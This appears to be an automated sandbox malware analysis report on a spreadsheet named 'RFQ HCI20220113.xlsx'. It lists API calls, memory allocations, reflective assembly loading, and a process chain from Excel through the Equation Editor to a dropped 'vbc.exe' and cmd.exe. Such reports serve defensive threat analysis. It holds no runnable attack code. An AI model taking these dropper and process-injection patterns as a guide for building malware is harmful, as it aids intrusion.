Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E2CF8	4_2_002E2CF8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E0D11	4_2_002E0D11
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00901B10	4_2_00901B10
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00401030	5_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041C95A	5_2_0041C95A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041C96E	5_2_0041C96E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041D128	5_2_0041D128
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041C38D	5_2_0041C38D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041BB9E	5_2_0041BB9E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00408C90	5_2_00408C90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402D8A	5_2_00402D8A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402D90	5_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041BF8B	5_2_0041BF8B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402FB0	5_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EE0C6	5_2_008EE0C6
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0091D005	5_2_0091D005
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090905A	5_2_0090905A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008F3040	5_2_008F3040
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EE2E9	5_2_008EE2E9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00991238	5_2_00991238
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EF3CF	5_2_008EF3CF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009163DB	5_2_009163DB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008F2305	5_2_008F2305
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008F7353	5_2_008F7353
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0093A37B	5_2_0093A37B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00925485	5_2_00925485
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00901489	5_2_00901489
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090C5F0	5_2_0090C5F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008F351F	5_2_008F351F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008F4680	5_2_008F4680
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008FE6C1	5_2_008FE6C1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00992622	5_2_00992622
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0097579A	5_2_0097579A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008FC7BC	5_2_008FC7BC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0098F8EE	5_2_0098F8EE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008FC85C	5_2_008FC85C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0091286D	5_2_0091286D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0099098E	5_2_0099098E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008F29B2	5_2_008F29B2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009069FE	5_2_009069FE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00975955	5_2_00975955
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_022A1238	7_2_022A1238
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021FE2E9	7_2_021FE2E9
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02202305	7_2_02202305
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0224A37B	7_2_0224A37B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02207353	7_2_02207353
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_022A63BF	7_2_022A63BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021FF3CF	7_2_021FF3CF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_022263DB	7_2_022263DB
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0222D005	7_2_0222D005
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02203040	7_2_02203040
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0221905A	7_2_0221905A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021FE0C6	7_2_021FE0C6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_022A2622	7_2_022A2622
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0224A634	7_2_0224A634
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02204680	7_2_02204680
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0220E6C1	7_2_0220E6C1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0220C7BC	7_2_0220C7BC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0228579A	7_2_0228579A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_022357C3	7_2_022357C3
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0228443E	7_2_0228443E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0223D47D	7_2_0223D47D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02235485	7_2_02235485
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02211489	7_2_02211489
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0220351F	7_2_0220351F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02246540	7_2_02246540
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0221C5F0	7_2_0221C5F0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_022B3A83	7_2_022B3A83
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02227B00	7_2_02227B00
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_022ACBA4	7_2_022ACBA4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021FFBD7	7_2_021FFBD7
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0228DBDA	7_2_0228DBDA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0222286D	7_2_0222286D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0220C85C	7_2_0220C85C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0229F8EE	7_2_0229F8EE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0228394B	7_2_0228394B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02285955	7_2_02285955
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_022029B2	7_2_022029B2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_022A098E	7_2_022A098E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_022169FE	7_2_022169FE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02232E2F	7_2_02232E2F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0221EE4C	7_2_0221EE4C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02210F3F	7_2_02210F3F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0222DF7C	7_2_0222DF7C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0229CFB1	7_2_0229CFB1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02272FDC	7_2_02272FDC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02230D3B	7_2_02230D3B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0220CD5B	7_2_0220CD5B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0229FDDD	7_2_0229FDDD
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_000DD128	7_2_000DD128
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_000DC38D	7_2_000DC38D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_000DC95A	7_2_000DC95A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_000DC96E	7_2_000DC96E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_000DBB9E	7_2_000DBB9E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_000C8C90	7_2_000C8C90
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_000C2D8A	7_2_000C2D8A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_000C2D90	7_2_000C2D90
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_000C2FB0	7_2_000C2FB0

Source: C:\Users\Public\vbc.exe	Code function: String function: 0095F970 appears 49 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0093373B appears 148 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00933F92 appears 66 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 008EDF5C appears 71 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 0226F970 appears 84 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 021FDF5C appears 119 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 021FE2A8 appears 38 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 0224373B appears 245 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 02243F92 appears 132 times

Source: C:\Users\Public\vbc.exe	Code function: 5_2_004185F0 NtCreateFile,	5_2_004185F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004186A0 NtReadFile,	5_2_004186A0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00418720 NtClose,	5_2_00418720
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004187D0 NtAllocateVirtualMemory,	5_2_004187D0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00418642 NtCreateFile,	5_2_00418642
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041869D NtReadFile,	5_2_0041869D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041871A NtClose,	5_2_0041871A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004187CB NtAllocateVirtualMemory,	5_2_004187CB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008E00C4 NtCreateFile,LdrInitializeThunk,	5_2_008E00C4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008E0048 NtProtectVirtualMemory,LdrInitializeThunk,	5_2_008E0048
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008E0078 NtResumeThread,LdrInitializeThunk,	5_2_008E0078
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008E07AC NtCreateMutant,LdrInitializeThunk,	5_2_008E07AC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DF9F0 NtClose,LdrInitializeThunk,	5_2_008DF9F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DF900 NtReadFile,LdrInitializeThunk,	5_2_008DF900
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_008DFAD0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFAE8 NtQueryInformationProcess,LdrInitializeThunk,	5_2_008DFAE8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFBB8 NtQueryInformationToken,LdrInitializeThunk,	5_2_008DFBB8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFB68 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_008DFB68
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFC90 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_008DFC90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFC60 NtMapViewOfSection,LdrInitializeThunk,	5_2_008DFC60
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFD8C NtDelayExecution,LdrInitializeThunk,	5_2_008DFD8C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFDC0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_008DFDC0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFEA0 NtReadVirtualMemory,LdrInitializeThunk,	5_2_008DFEA0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_008DFED0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DFFB4 NtCreateSection,LdrInitializeThunk,	5_2_008DFFB4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008E10D0 NtOpenProcessToken,	5_2_008E10D0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008E0060 NtQuerySection,	5_2_008E0060
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008E01D4 NtSetValueKey,	5_2_008E01D4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008E010C NtOpenDirectoryObject,	5_2_008E010C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008E1148 NtOpenThread,	5_2_008E1148
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DF8CC NtWaitForSingleObject,	5_2_008DF8CC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DF938 NtWriteFile,	5_2_008DF938
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008E1930 NtSetContextThread,	5_2_008E1930
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021F00C4 NtCreateFile,LdrInitializeThunk,	7_2_021F00C4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021F07AC NtCreateMutant,LdrInitializeThunk,	7_2_021F07AC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021EFAE8 NtQueryInformationProcess,LdrInitializeThunk,	7_2_021EFAE8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021EFB50 NtCreateKey,LdrInitializeThunk,	7_2_021EFB50
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021EFB68 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_021EFB68
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021EFBB8 NtQueryInformationToken,LdrInitializeThunk,	7_2_021EFBB8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021EF900 NtReadFile,LdrInitializeThunk,	7_2_021EF900
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021EF9F0 NtClose,LdrInitializeThunk,	7_2_021EF9F0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_021EFED0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021EFFB4 NtCreateSection,LdrInitializeThunk,	7_2_021EFFB4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021EFC60 NtMapViewOfSection,LdrInitializeThunk,	7_2_021EFC60
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021EFD8C NtDelayExecution,LdrInitializeThunk,	7_2_021EFD8C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021EFDC0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_021EFDC0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021F0048 NtProtectVirtualMemory,	7_2_021F0048
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021F0078 NtResumeThread,	7_2_021F0078
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021F0060 NtQuerySection,	7_2_021F0060
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021F10D0 NtOpenProcessToken,	7_2_021F10D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021F010C NtOpenDirectoryObject,	7_2_021F010C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021F1148 NtOpenThread,	7_2_021F1148
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021F01D4 NtSetValueKey,	7_2_021F01D4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021EFA20 NtQueryInformationFile,	7_2_021EFA20
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021EFA50 NtEnumerateValueKey,	7_2_021EFA50
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021EFAB8 NtQueryValueKey,	7_2_021EFAB8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021EFAD0 NtAllocateVirtualMemory,	7_2_021EFAD0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021EFBE8 NtQueryVirtualMemory,	7_2_021EFBE8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021EF8CC NtWaitForSingleObject,	7_2_021EF8CC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021EF938 NtWriteFile,	7_2_021EF938
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021F1930 NtSetContextThread,	7_2_021F1930
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021EFE24 NtWriteVirtualMemory,	7_2_021EFE24
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021EFEA0 NtReadVirtualMemory,	7_2_021EFEA0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021EFF34 NtQueueApcThread,	7_2_021EFF34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021EFFFC NtCreateProcessEx,	7_2_021EFFFC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021EFC30 NtOpenProcess,	7_2_021EFC30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021EFC48 NtSetInformationFile,	7_2_021EFC48
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021F0C40 NtGetContextThread,	7_2_021F0C40
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021EFC90 NtUnmapViewOfSection,	7_2_021EFC90
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021EFD5C NtEnumerateKey,	7_2_021EFD5C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021F1D80 NtSuspendThread,	7_2_021F1D80
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_000D85F0 NtCreateFile,	7_2_000D85F0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_000D86A0 NtReadFile,	7_2_000D86A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_000D8720 NtClose,	7_2_000D8720
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_000D8642 NtCreateFile,	7_2_000D8642
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_000D869D NtReadFile,	7_2_000D869D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_000D871A NtClose,	7_2_000D871A

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: vbc.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior

Windows Analysis Report RFQ HCI20220113.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: vbc.exe.2.dr, u0005u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: vbc[1].exe.2.dr, u0005u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.vbc.exe.11a0000.0.unpack, u0005u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.vbc.exe.11a0000.2.unpack, u0005u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.vbc.exe.11a0000.2.unpack, u0005u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.vbc.exe.11a0000.6.unpack, u0005u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.vbc.exe.11a0000.8.unpack, u0005u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.vbc.exe.11a0000.1.unpack, u0005u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.vbc.exe.11a0000.4.unpack, u0005u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.vbc.exe.11a0000.0.unpack, u0005u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.vbc.exe.11a0000.10.unpack, u0005u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.vbc.exe.11a0000.3.unpack, u0005u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.vbc.exe.11a0000.4.unpack, u0005u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\Public\vbc.exe	Code function: 4_2_011A6167 push 3A000004h; retf 0000h	4_2_011A616C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_011A642A push es; retf	4_2_011A6437
Source: C:\Users\Public\vbc.exe	Code function: 4_2_011A7296 push FFFFFFA1h; iretd	4_2_011A72A2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_011A6AFF push es; iretd	4_2_011A6B51
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E6295 push edi; ret	4_2_002E6296
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EB630 pushfd ; ret	4_2_002EB631
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EB69C pushfd ; ret	4_2_002EB69E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EB6E2 pushfd ; ret	4_2_002EB6E3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B842 push eax; ret	5_2_0041B848
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B84B push eax; ret	5_2_0041B8B2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004188F2 push ds; ret	5_2_004188F3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B8AC push eax; ret	5_2_0041B8B2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00416109 push cs; iretd	5_2_0041610A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00415237 pushfd ; iretd	5_2_00415238
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B7F5 push eax; ret	5_2_0041B848
Source: C:\Users\Public\vbc.exe	Code function: 5_2_011A6167 push 3A000004h; retf 0000h	5_2_011A616C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_011A7296 push FFFFFFA1h; iretd	5_2_011A72A2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_011A6AFF push es; iretd	5_2_011A6B51
Source: C:\Users\Public\vbc.exe	Code function: 5_2_011A642A push es; retf	5_2_011A6437
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_021FDFA1 push ecx; ret	7_2_021FDFB4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_000D6109 push cs; iretd	7_2_000D610A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_000D5237 pushfd ; iretd	7_2_000D5238
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_000DB7F5 push eax; ret	7_2_000DB848
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_000DB84B push eax; ret	7_2_000DB8B2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_000DB842 push eax; ret	7_2_000DB848
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_000DB8AC push eax; ret	7_2_000DB8B2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_000D88F2 push ds; ret	7_2_000D88F3

Source: initial sample	Static PE information: section name: .text entropy: 7.74258433139
Source: initial sample	Static PE information: section name: .text entropy: 7.74258433139

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
